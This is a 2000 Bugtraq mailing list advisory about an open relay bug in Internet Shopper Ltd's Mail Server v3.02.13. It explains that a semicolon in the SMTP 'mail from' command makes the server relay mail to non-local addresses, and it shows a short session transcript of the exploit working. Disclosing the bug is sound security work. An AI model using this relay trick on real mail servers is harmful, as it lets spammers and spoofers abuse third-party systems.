Bugtraq mailing list archives
Internet Shopper Ltd's Mail Server Open relay bug.
From: Imran Ghory <ImranG () BTINTERNET COM>
Date: Fri, 15 Sep 2000 20:41:35 +0100
Internet Shopper Ltd's Mail Server Open relay bug. (I have been unable to make contact with Internet Shopper Ltd, and as this bug might easily be found accidently I have decide to make it public) SUMMARY: Internet Shopper Ltd's Mail Server can be made to accept and handle mail for non-local sites. DETAILS: Version involved: Internet Shopper Ltd's Mail Server v3.02.13 No other versions have been tested. Exploit: The use of the semi-colon in the "mail from" command will allow mail to be sent to machine that aren't local. Exploit in action: 220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100 helo me 250 mailsvr.xxxxxxxxxx.ac.uk me mail from; 250 Ok. rcpt to: ImranG () btinternet com 250 Ok. data 354 Start mail input, end with <CRLF>.<CRLF>. Test data . 250 Requested mail action Ok. quit 221 Goodbye me Fix: None known at this time. Imran Ghory
Current thread:
- Internet Shopper Ltd's Mail Server Open relay bug. Imran Ghory (Sep 17)